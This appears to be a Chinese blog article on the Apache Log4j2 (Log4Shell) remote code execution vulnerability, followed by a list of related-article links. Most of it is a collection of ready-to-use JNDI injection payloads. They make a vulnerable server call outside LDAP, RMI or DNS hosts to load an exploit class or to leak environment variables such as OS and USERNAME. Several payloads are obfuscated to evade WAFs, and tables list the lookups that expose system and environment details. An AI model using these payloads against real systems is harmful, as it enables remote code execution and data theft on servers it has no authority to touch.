当前位置: 首页 > article >正文

《漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞

log4j2 支持很多协议,例如通过 ldap 查找变量,通过 docker 查找变量,从网上大家的测试来看,主要使用 ldap 来构造 payload,详细参考这里:

1.常用payload
${jndi:ldap://127.0.0.1:1389/ Badclassname}
${jndi:ldap://xxx.xxx.xxx.xxx/exp}//Windows
${jndi:dns://${env:OS}.dnslog.com}  		
${jndi:dns://${env:USERNAME}.dnslog.com}  	//过waf
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}	
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exploit.class}	
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
log4j-java
IDusagemethod
1${java:version}getSystemProperty(“java.version”)
2${java:runtime}getRuntime()
3${java:vm}getVirtualMachine()
4${java:os}getOperatingSystem()
5${java:hw}getHardware()
6${java:locale}getLocale()
Linux
idusage
1${env:CLASSPATH}
2${env:HOME}
3${env:JAVA_HOME}
4${env:LANG}
5${env:LOGNAME}
6${env:MAIL}
7${env:PATH}
8${env:PWD}
9${env:SHELL}
10${env:USER}
Windows
idusage
1${env:A8_HOME}
2${env:A8_ROOT_BIN}
3${env:CLASSPATH}
4${env:JRE_HOME}
5${env:Java_Home}
6${env:LOGONSERVER}
7${env:OS}
8${env:Path}
9${env:USERDOMAIN}
10${env:USERNAME}
log4j2-sys
idusage
http://www.lryc.cn/news/2420146.html

相关文章:

  • beyond compare简易破解方法
  • 【编程实践】Google Guava 极简教程
  • 知识点 | 今天好好学习MPP和MapReduce分别是个嘛?!
  • 微信小程序框架weui的基础使用
  • 带你正确认识Unicode和UTF-8
  • EIP的理解
  • C语言MD5算法
  • 从零学MyCat(一)Mycat基本介绍及安装
  • [HPC入门] 高性能计算 (HPC) 是什么?哪些业务场景需要HPC?
  • JPA Spring Data JPA详解
  • 一文弄懂 Unicode 编码
  • 字符串 格式化 String.format()的详细解释
  • 【计算机网络】localhost不能访问,127.0.0.1可以访问?
  • win10自动更新关闭
  • Fiverr 攻略:跨境自由职业通过 Fiverr 盈利
  • freemark--模版引擎
  • Java——反射(reflection)详解
  • SSM基于协同过滤推荐算法的新闻推荐系统43149
  • Hibernate—(搭建、简单使用)
  • DNS的原理与搭建
  • FIFO存储器概念介绍
  • ORACLE 可插拔式pdb
  • Tensorflow,pytorch,Caffe,MXNet,PaddlePaddle,THeano算法框架哪家强?
  • 【ruoyi-vue】yml文件解析
  • 元数据简析:定义及管理
  • 安装配置 | 用同济邮箱账户下载matlab
  • 支持向量机(SVM)通俗版讲解
  • Python123
  • font字体的一些常用代码
  • Linux命令之nc